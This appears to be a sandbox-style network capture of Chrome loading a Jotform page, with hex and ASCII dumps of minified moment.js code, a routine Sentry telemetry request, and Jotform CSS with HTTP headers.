                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC940INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 61 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 61 29 3a 65 2e 6d 6f 6d 65 6e 74 3d 61 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 45 3b 66 75 6e 63 74 69 6f 6e 20 4d 28 29 7b 72 65 74 75 72 6e 20 45 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 72 65 74 75 72 6e 20 65 20 69 6e 73 74
                                                                                                                                                                                                                                            Data Ascii: !function(e,a){"object"==typeof exports&&"undefined"!=typeof module?module.exports=a():"function"==typeof define&&define.amd?define(a):e.moment=a()}(this,function(){"use strict";var E;function M(){return E.apply(null,arguments)}function F(e){return e inst
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 28 65 5b 74 5d 3d 61 5b 74 5d 29 3b 72 65 74 75 72 6e 20 6c 28 61 2c 22 74 6f 53 74 72 69 6e 67 22 29 26 26 28 65 2e 74 6f 53 74 72 69 6e 67 3d 61 2e 74 6f 53 74 72 69 6e 67 29 2c 6c 28 61 2c 22 76 61 6c 75 65 4f 66 22 29 26 26 28 65 2e 76 61 6c 75 65 4f 66 3d 61 2e 76 61 6c 75 65 4f 66 29 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 55 28 65 2c 61 2c 74 2c 73 29 7b 72 65 74 75 72 6e 20 46 61 28 65 2c 61 2c 74 2c 73 2c 21 30 29 2e 75 74 63 28 29 7d 66 75 6e 63 74 69 6f 6e 20 68 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 2e 5f 70 66 26 26 28 65 2e 5f 70 66 3d 7b 65 6d 70 74 79 3a 21 31 2c 75 6e 75 73 65 64 54 6f 6b 65 6e 73 3a 5b 5d 2c 75 6e 75 73 65 64 49 6e 70 75 74 3a 5b 5d 2c 6f 76 65 72 66 6c 6f 77 3a 2d 32 2c 63 68 61 72 73 4c 65 66 74 4f 76 65 72
                                                                                                                                                                                                                                            Data Ascii: (e[t]=a[t]);return l(a,"toString")&&(e.toString=a.toString),l(a,"valueOf")&&(e.valueOf=a.valueOf),e}function U(e,a,t,s){return Fa(e,a,t,s,!0).utc()}function h(e){return null==e._pf&&(e._pf={empty:!1,unusedTokens:[],unusedInput:[],overflow:-2,charsLeftOver
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 7a 6d 3d 61 2e 5f 74 7a 6d 29 2c 64 28 61 2e 5f 69 73 55 54 43 29 7c 7c 28 65 2e 5f 69 73 55 54 43 3d 61 2e 5f 69 73 55 54 43 29 2c 64 28 61 2e 5f 6f 66 66 73 65 74 29 7c 7c 28 65 2e 5f 6f 66 66 73 65 74 3d 61 2e 5f 6f 66 66 73 65 74 29 2c 64 28 61 2e 5f 70 66 29 7c 7c 28 65 2e 5f 70 66 3d 68 28 61 29 29 2c 64 28 61 2e 5f 6c 6f 63 61 6c 65 29 7c 7c 28 65 2e 5f 6c 6f 63 61 6c 65 3d 61 2e 5f 6c 6f 63 61 6c 65 29 2c 30 3c 72 29 66 6f 72 28 74 3d 30 3b 74 3c 72 3b 74 2b 2b 29 64 28 6e 3d 61 5b 73 3d 4b 5b 74 5d 5d 29 7c 7c 28 65 5b 73 5d 3d 6e 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 24 28 65 29 7b 5a 28 74 68 69 73 2c 65 29 2c 74 68 69 73 2e 5f 64 3d 6e 65 77 20 44 61 74 65 28 6e 75 6c 6c 21 3d 65 2e 5f 64 3f 65 2e 5f 64 2e 67 65 74 54 69
                                                                                                                                                                                                                                            Data Ascii: zm=a._tzm),d(a._isUTC)||(e._isUTC=a._isUTC),d(a._offset)||(e._offset=a._offset),d(a._pf)||(e._pf=h(a)),d(a._locale)||(e._locale=a._locale),0<r)for(t=0;t<r;t++)d(n=a[s=K[t]])||(e[s]=n);return e}function $(e){Z(this,e),this._d=new Date(null!=e._d?e._d.getTi
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 65 74 65 20 73 5b 74 5d 29 3b 66 6f 72 28 74 20 69 6e 20 65 29 6c 28 65 2c 74 29 26 26 21 6c 28 61 2c 74 29 26 26 7a 28 65 5b 74 5d 29 26 26 28 73 5b 74 5d 3d 49 28 7b 7d 2c 73 5b 74 5d 29 29 3b 72 65 74 75 72 6e 20 73 7d 66 75 6e 63 74 69 6f 6e 20 6e 65 28 65 29 7b 6e 75 6c 6c 21 3d 65 26 26 74 68 69 73 2e 73 65 74 28 65 29 7d 4d 2e 73 75 70 70 72 65 73 73 44 65 70 72 65 63 61 74 69 6f 6e 57 61 72 6e 69 6e 67 73 3d 21 31 2c 4d 2e 64 65 70 72 65 63 61 74 69 6f 6e 48 61 6e 64 6c 65 72 3d 6e 75 6c 6c 3b 76 61 72 20 72 65 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 61 2c 74 3d 5b 5d 3b 66 6f 72 28 61 20 69 6e 20 65 29 6c 28 65 2c 61 29 26 26 74 2e 70 75 73 68 28 61 29 3b 72 65 74 75 72 6e 20 74 7d 3b 66 75 6e 63
                                                                                                                                                                                                                                            Data Ascii: ete s[t]);for(t in e)l(e,t)&&!l(a,t)&&z(e[t])&&(s[t]=I({},s[t]));return s}function ne(e){null!=e&&this.set(e)}M.suppressDeprecationWarnings=!1,M.deprecationHandler=null;var re=Object.keys||function(e){var a,t=[];for(a in e)l(e,a)&&t.push(a);return t};func
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 73 29 2c 5f 65 2e 6c 61 73 74 49 6e 64 65 78 3d 30 2c 2d 2d 74 3b 72 65 74 75 72 6e 20 65 7d 76 61 72 20 4d 65 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 61 29 7b 76 61 72 20 74 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 4d 65 5b 74 5d 3d 4d 65 5b 74 2b 22 73 22 5d 3d 4d 65 5b 61 5d 3d 65 7d 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 4d 65 5b 65 5d 7c 7c 4d 65 5b 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 3a 76 6f 69 64 20 30 7d 66 75 6e 63 74 69 6f 6e 20 68 65 28 65 29 7b 76 61 72 20 61 2c 74 2c 73 3d 7b 7d 3b 66 6f 72 28 74 20 69 6e 20 65 29 6c 28 65 2c 74 29 26 26 28 61 3d 69 28 74 29 29 26 26 28 73 5b 61 5d 3d 65 5b 74 5d 29 3b 72 65 74 75 72 6e 20 73 7d 76
                                                                                                                                                                                                                                            Data Ascii: s),_e.lastIndex=0,--t;return e}var Me={};function a(e,a){var t=e.toLowerCase();Me[t]=Me[t+"s"]=Me[a]=e}function i(e){return"string"==typeof e?Me[e]||Me[e.toLowerCase()]:void 0}function he(e){var a,t,s={};for(t in e)l(e,t)&&(a=i(t))&&(s[a]=e[t]);return s}v
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 22 22 29 2e 72 65 70 6c 61 63 65 28 2f 5c 5c 28 5c 5b 29 7c 5c 5c 28 5c 5d 29 7c 5c 5b 28 5b 5e 5c 5d 5c 5b 5d 2a 29 5c 5d 7c 5c 5c 28 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 74 2c 73 2c 6e 29 7b 72 65 74 75 72 6e 20 61 7c 7c 74 7c 7c 73 7c 7c 6e 7d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 72 65 70 6c 61 63 65 28 2f 5b 2d 5c 2f 5c 5c 5e 24 2a 2b 3f 2e 28 29 7c 5b 5c 5d 7b 7d 5d 2f 67 2c 22 5c 5c 24 26 22 29 7d 76 61 72 20 48 65 3d 7b 7d 2c 76 65 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 44 28 65 2c 74 29 7b 76 61 72 20 61 2c 73 2c 6e 3d 74 3b 66 6f 72 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 65 3d 5b 65 5d 29 2c 4a 28 74 29 26 26 28 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 61 29 7b
                                                                                                                                                                                                                                            Data Ascii: "").replace(/\\(\[)|\\(\])|\[([^\]\[]*)\]|\\(.)/g,function(e,a,t,s,n){return a||t||s||n})))}function k(e){return e.replace(/[-\/\\^$*+?.()|[\]{}]/g,"\\$&")}var He={},ve={};function D(e,t){var a,s,n=t;for("string"==typeof e&&(e=[e]),J(t)&&(n=function(e,a){
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 61 72 20 74 3b 69 66 28 65 2e 69 73 56 61 6c 69 64 28 29 29 7b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 61 29 69 66 28 2f 5e 5c 64 2b 24 2f 2e 74 65 73 74 28 61 29 29 61 3d 6d 28 61 29 3b 65 6c 73 65 20 69 66 28 21 4a 28 61 3d 65 2e 6c 6f 63 61 6c 65 44 61 74 61 28 29 2e 6d 6f 6e 74 68 73 50 61 72 73 65 28 61 29 29 29 72 65 74 75 72 6e 3b 74 3d 4d 61 74 68 2e 6d 69 6e 28 65 2e 64 61 74 65 28 29 2c 7a 65 28 65 2e 79 65 61 72 28 29 2c 61 29 29 2c 65 2e 5f 64 5b 22 73 65 74 22 2b 28 65 2e 5f 69 73 55 54 43 3f 22 55 54 43 22 3a 22 22 29 2b 22 4d 6f 6e 74 68 22 5d 28 61 2c 74 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 47 65 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 65 3f 28 55 65 28 74 68 69 73 2c 65 29 2c 4d 2e 75 70 64 61 74 65 4f 66 66
                                                                                                                                                                                                                                            Data Ascii: ar t;if(e.isValid()){if("string"==typeof a)if(/^\d+$/.test(a))a=m(a);else if(!J(a=e.localeData().monthsParse(a)))return;t=Math.min(e.date(),ze(e.year(),a)),e._d["set"+(e._isUTC?"UTC":"")+"Month"](a,t)}}function Ge(e){return null!=e?(Ue(this,e),M.updateOff
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 67 69 74 59 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6d 28 65 29 2b 28 36 38 3c 6d 28 65 29 3f 31 39 30 30 3a 32 65 33 29 7d 3b 76 61 72 20 4b 65 3d 59 65 28 22 46 75 6c 6c 59 65 61 72 22 2c 21 30 29 3b 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 2c 61 2c 74 2c 73 2c 6e 2c 72 2c 64 29 7b 76 61 72 20 69 3b 72 65 74 75 72 6e 20 65 3c 31 30 30 26 26 30 3c 3d 65 3f 28 69 3d 6e 65 77 20 44 61 74 65 28 65 2b 34 30 30 2c 61 2c 74 2c 73 2c 6e 2c 72 2c 64 29 2c 69 73 46 69 6e 69 74 65 28 69 2e 67 65 74 46 75 6c 6c 59 65 61 72 28 29 29 26 26 69 2e 73 65 74 46 75 6c 6c 59 65 61 72 28 65 29 29 3a 69 3d 6e 65 77 20 44 61 74 65 28 65 2c 61 2c 74 2c 73 2c 6e 2c 72 2c 64 29 2c 69 7d 66 75 6e 63 74 69 6f 6e 20 5a 65 28 65 29 7b 76 61 72 20 61 3b 72
                                                                                                                                                                                                                                            Data Ascii: gitYear=function(e){return m(e)+(68<m(e)?1900:2e3)};var Ke=Ye("FullYear",!0);function qe(e,a,t,s,n,r,d){var i;return e<100&&0<=e?(i=new Date(e+400,a,t,s,n,r,d),isFinite(i.getFullYear())&&i.setFullYear(e)):i=new Date(e,a,t,s,n,r,d),i}function Ze(e){var a;r
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 53 68 6f 72 74 28 74 68 69 73 2c 65 29 7d 29 2c 73 28 22 64 64 64 64 22 2c 30 2c 30 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6c 6f 63 61 6c 65 44 61 74 61 28 29 2e 77 65 65 6b 64 61 79 73 28 74 68 69 73 2c 65 29 7d 29 2c 73 28 22 65 22 2c 30 2c 30 2c 22 77 65 65 6b 64 61 79 22 29 2c 73 28 22 45 22 2c 30 2c 30 2c 22 69 73 6f 57 65 65 6b 64 61 79 22 29 2c 61 28 22 64 61 79 22 2c 22 64 22 29 2c 61 28 22 77 65 65 6b 64 61 79 22 2c 22 65 22 29 2c 61 28 22 69 73 6f 57 65 65 6b 64 61 79 22 2c 22 45 22 29 2c 74 28 22 64 61 79 22 2c 31 31 29 2c 74 28 22 77 65 65 6b 64 61 79 22 2c 31 31 29 2c 74 28 22 69 73 6f 57 65 65 6b 64 61 79 22 2c 31 31 29 2c 70 28 22 64 22 2c 6f 29 2c 70 28 22 65 22 2c 6f 29 2c 70 28 22 45 22 2c 6f 29 2c 70
                                                                                                                                                                                                                                            Data Ascii: Short(this,e)}),s("dddd",0,0,function(e){return this.localeData().weekdays(this,e)}),s("e",0,0,"weekday"),s("E",0,0,"isoWeekday"),a("day","d"),a("weekday","e"),a("isoWeekday","E"),t("day",11),t("weekday",11),t("isoWeekday",11),p("d",o),p("e",o),p("E",o),p
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 78 70 28 22 5e 28 22 2b 6e 2e 6a 6f 69 6e 28 22 7c 22 29 2b 22 29 22 2c 22 69 22 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 61 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 68 6f 75 72 73 28 29 25 31 32 7c 7c 31 32 7d 66 75 6e 63 74 69 6f 6e 20 6d 61 28 65 2c 61 29 7b 73 28 65 2c 30 2c 30 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6c 6f 63 61 6c 65 44 61 74 61 28 29 2e 6d 65 72 69 64 69 65 6d 28 74 68 69 73 2e 68 6f 75 72 73 28 29 2c 74 68 69 73 2e 6d 69 6e 75 74 65 73 28 29 2c 61 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 75 61 28 65 2c 61 29 7b 72 65 74 75 72 6e 20 61 2e 5f 6d 65 72 69 64 69 65 6d 50 61 72 73 65 7d 73 28 22 48 22 2c 5b 22 48 48 22 2c 32 5d 2c 30 2c 22 68 6f 75 72 22 29 2c 73 28 22 68 22 2c 5b 22 68 68 22 2c 32 5d 2c 30
                                                                                                                                                                                                                                            Data Ascii: xp("^("+n.join("|")+")","i")}function oa(){return this.hours()%12||12}function ma(e,a){s(e,0,0,function(){return this.localeData().meridiem(this.hours(),this.minutes(),a)})}function ua(e,a){return a._meridiemParse}s("H",["HH",2],0,"hour"),s("h",["hh",2],0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            49192.168.2.174976134.120.195.2494435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC740OUTPOST /api/5223511/envelope/?sentry_key=36d29a013f8a4bd7adfe310f5fe4d75a&sentry_version=7&sentry_client=sentry.javascript.react%2F8.34.0 HTTP/1.1
                                                                                                                                                                                                                                            Host: o61806.ingest.sentry.io
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Origin: https://eu.jotform.com
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC468OUTData Raw: 7b 22 73 65 6e 74 5f 61 74 22 3a 22 32 30 32 35 2d 30 31 2d 31 30 54 31 32 3a 33 36 3a 31 33 2e 35 30 37 5a 22 2c 22 73 64 6b 22 3a 7b 22 6e 61 6d 65 22 3a 22 73 65 6e 74 72 79 2e 6a 61 76 61 73 63 72 69 70 74 2e 72 65 61 63 74 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 38 2e 33 34 2e 30 22 7d 7d 0a 7b 22 74 79 70 65 22 3a 22 73 65 73 73 69 6f 6e 22 7d 0a 7b 22 73 69 64 22 3a 22 61 37 37 62 37 35 32 64 62 35 36 65 34 64 35 61 39 62 34 66 36 37 36 31 63 63 35 62 33 62 36 32 22 2c 22 69 6e 69 74 22 3a 74 72 75 65 2c 22 73 74 61 72 74 65 64 22 3a 22 32 30 32 35 2d 30 31 2d 31 30 54 31 32 3a 33 36 3a 31 33 2e 35 30 35 5a 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 35 2d 30 31 2d 31 30 54 31 32 3a 33 36 3a 31 33 2e 35 30 35 5a 22 2c 22 73 74 61 74 75 73
                                                                                                                                                                                                                                            Data Ascii: {"sent_at":"2025-01-10T12:36:13.507Z","sdk":{"name":"sentry.javascript.react","version":"8.34.0"}}{"type":"session"}{"sid":"a77b752db56e4d5a9b4f6761cc5b3b62","init":true,"started":"2025-01-10T12:36:13.505Z","timestamp":"2025-01-10T12:36:13.505Z","status
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC530INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:15 GMT
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            access-control-expose-headers: x-sentry-error,x-sentry-rate-limits,retry-after
                                                                                                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC12INData Raw: 32 0d 0a 7b 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 2{}0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            50192.168.2.1749763104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC582OUTGET /s/portal/674ac14411e/static/css/6354.b5c7ba01.chunk.css HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn03.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC421INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:15 GMT
                                                                                                                                                                                                                                            Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 85033
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:21:17 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "3a81f9f59313abfb144df402ab0ef0f2"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 277
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb62d4cb7f799-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC948INData Raw: 2e 66 6f 72 6d 41 63 63 6f 75 6e 74 42 6f 78 2d 77 72 61 70 70 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 31 32 70 78 3b 72 69 67 68 74 3a 31 32 70 78 7d 2e 6a 66 43 61 72 64 46 6f 72 6d 2e 69 73 4d 6f 62 69 6c 65 20 2e 66 6f 72 6d 41 63 63 6f 75 6e 74 42 6f 78 2d 77 72 61 70 70 65 72 7b 74 6f 70 3a 38 70 78 3b 72 69 67 68 74 3a 38 70 78 7d 2e 61 76 61 74 61 72 42 6f 78 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 39 38 64 30 32 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 35 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d
                                                                                                                                                                                                                                            Data Ascii: .formAccountBox-wrapper{text-align:left;position:absolute;top:12px;right:12px}.jfCardForm.isMobile .formAccountBox-wrapper{top:8px;right:8px}.avatarBox{cursor:pointer;background-color:#f98d02;background-position:50%;background-repeat:no-repeat;background-
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 74 65 3b 74 6f 70 3a 2d 36 70 78 3b 72 69 67 68 74 3a 31 35 70 78 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 34 35 64 65 67 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 2d 31 70 78 20 2d 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 35 29 7d 2e 66 6f 72 6d 41 63 63 6f 75 6e 74 42 6f 78 2d 6c 69 6e 65 7b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 31 36 70 78 7d 2e 66 6f 72 6d 41 63 63 6f 75 6e 74 42 6f 78 2d 6c 69 6e 65 2e 66 6f 72 55 73 65 72 49 6e 66 6f 7b 63 6f 6c 6f 72 3a 23 36 30 37 64 38 62 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 66 64 38 64 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 66 6f 72 6d 41 63 63 6f 75 6e 74 42 6f 78 2d 6c 69 6e 65 2e 66 6f 72 55 73 65 72 49 6e 66 6f 20 73 70
                                                                                                                                                                                                                                            Data Ascii: te;top:-6px;right:15px;transform:rotate(45deg);box-shadow:-1px -1px 1px rgba(0,0,0,.5)}.formAccountBox-line{padding:10px 16px}.formAccountBox-line.forUserInfo{color:#607d8b;border-bottom:1px solid #cfd8dc;font-size:16px}.formAccountBox-line.forUserInfo sp
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 77 48 65 61 64 65 72 2d 61 63 63 6f 75 6e 74 42 6f 78 57 72 61 70 70 65 72 20 2e 73 77 73 20 2e 73 77 73 2d 63 6f 6e 74 65 6e 74 3e 2e 73 6f 63 69 61 6c 2d 62 75 74 74 6f 6e 73 3e 2e 73 6f 63 69 61 6c 2d 62 75 74 74 6f 6e 73 2d 63 6f 6e 74 61 69 6e 65 72 3e 2e 78 63 6c 2d 73 71 75 61 72 65 2d 62 75 74 74 6f 6e 7b 77 69 64 74 68 3a 36 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 36 30 70 78 3b 68 65 69 67 68 74 3a 36 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 7d 2e 6a 4e 65 77 48 65 61 64 65 72 2d 61 63 63 6f 75 6e 74 42 6f 78 57 72 61 70 70 65 72 20 2e 73 77 73 20 2e 73 77 73 2d 63 6f 6e 74 65 6e 74 3e 2e 73 6f 63 69 61 6c 2d 62 75 74 74 6f 6e 73 3e 2e 73 6f 63 69 61 6c 2d 62 75 74 74 6f 6e 73 2d
                                                                                                                                                                                                                                            Data Ascii: wHeader-accountBoxWrapper .sws .sws-content>.social-buttons>.social-buttons-container>.xcl-square-button{width:60px;min-width:60px;height:60px;font-size:11px;line-height:16px}.jNewHeader-accountBoxWrapper .sws .sws-content>.social-buttons>.social-buttons-
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6a 4e 65 77 48 65 61 64 65 72 2d 61 63 63 6f 75 6e 74 42 6f 78 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 66 69 6c 74 65 72 3a 64 72 6f 70 2d 73 68 61 64 6f 77 28 2d 31 70 78 20 32 70 78 20 36 70 78 20 72 67 62 61 28 37 36 2c 37 39 2c 39 39 2c 2e 32 29 29 3b 66 69 6c 74 65 72 3a 64 72 6f 70 2d 73 68 61 64 6f 77 28 2d 31 70 78 20 32 70 78 20 36
                                                                                                                                                                                                                                            Data Ascii: r;background-color:transparent;border:none;padding:0;font-weight:700;line-height:16px;text-decoration:underline!important}.jNewHeader-accountBox{box-sizing:border-box;-webkit-filter:drop-shadow(-1px 2px 6px rgba(76,79,99,.2));filter:drop-shadow(-1px 2px 6
